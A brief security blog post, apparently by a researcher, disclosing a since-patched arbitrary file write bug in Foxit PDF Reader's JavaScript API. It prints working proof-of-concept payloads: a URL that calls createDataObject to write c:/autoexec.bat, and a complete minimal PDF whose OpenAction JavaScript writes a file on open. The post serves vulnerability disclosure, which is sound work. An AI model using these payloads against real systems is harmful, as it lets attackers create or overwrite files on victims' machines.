Dangerous file write bug in Foxit PDF Reader

This is fixed in the recently released Foxit PDF Reader v4.3.1.0218. That release is marked as an important security update, although this file bug is not mentioned.

Recently, I've been playing around with the various JavaScript APIs available in various different PDF readers. In case you wanted to do the same, I made some little tools, including a simple one to execute PDF-based JS via an URL:

https://cevans-app.appspot.com/static/pdfjs.html?js=app.alert('hi')

The serious bug I found in Foxit PDF Reader permits arbitrary files to be written with arbitrary content, like this:

https://cevans-app.appspot.com/static/pdfjs.html?js=createDataObject('c:/autoexec.bat','echo hi mom')

Files can be overwritten as well as created.

I did some hackery on the generated PDF and managed to squeeze a full valid PDF, including simple JS payload, into 136 characters. This means I can tweet the full PoC PDF, which I will do shortly :) Here it is for completeness:

%PDF 1 0 obj<</Pages 1 0 R /OpenAction 2 0 R>> 2 0 obj<</S /JavaScript /JS (createDataObject\('c:/pwn','pwn'\))>> trailer<</Root 1 0 R>>